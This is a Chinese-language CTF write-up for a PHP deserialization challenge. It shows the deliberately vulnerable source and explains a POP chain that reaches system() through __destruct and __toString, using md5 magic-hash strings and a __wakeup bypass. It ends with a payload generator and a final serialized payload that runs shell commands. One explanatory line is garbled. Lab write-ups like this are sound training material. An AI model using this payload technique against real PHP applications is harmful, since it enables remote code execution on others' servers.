[SWPUCTF 2022 新生赛]ez_1zpop
<?php
error_reporting(0);
class dxg
{
function fmm()
{
return "nonono";
}
}
class lt
{
public $impo='hi';
public $md51='weclome';
public $md52='to NSS';
function __construct()
{
$this->impo = new dxg;
}
function __wakeup()
{
$this->impo = new dxg;
return $this->impo->fmm();
}
function __toString()
{
if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
return $this->impo->fmm();
}
function __destruct()
{
echo $this;
}
}
class fin
{
public $a;
public $url = 'https://www.ctfer.vip';
public $title;
function fmm()
{
$b = $this->a;
$b($this->title);
}
}
if (isset($_GET['NSS'])) {
$Data = unserialize($_GET['NSS']);
} else {
highlight_file(__file__);
}
现找可利用的点
function fmm()
{
$b = $this->a;
$b($this->title);
}
把 b 当做函数调用了, b当做函数调用了, b当做函数调用了,b的值为 t h i s − > a ; 命令为( this->a; 命令为( this−>a;命令为(this->title);例system()
可以利用这个,将a的值提前写好为system,title为ls cat flag啥的
$b就会被赋值为system,内容为ls
在it类中触发__wake up,会返回到一个没有用的类里,要绕过一下
梳理下来,就是construct->to_string->destruct
<?php
error_reporting(0);
class lt
{
public $impo ;
public $md51 = 's878926199a';
public $md52 = 's155964671a';
}
class fin
{
public $a='system';
public $url = 'https://www.ctfer.vip';
public $title='ls /';
}
$a=new lt();
$a->impo=new fin();
echo serialize($a);
//O:2:"lt":3:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:4:"ls /";}s:4:"md51";s:11:"s878926199a";s:4:"md52";s:11:"s155964671a";}
最终playload
?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:11:"s878926199a";s:4:"md52";s:11:"s155964671a";}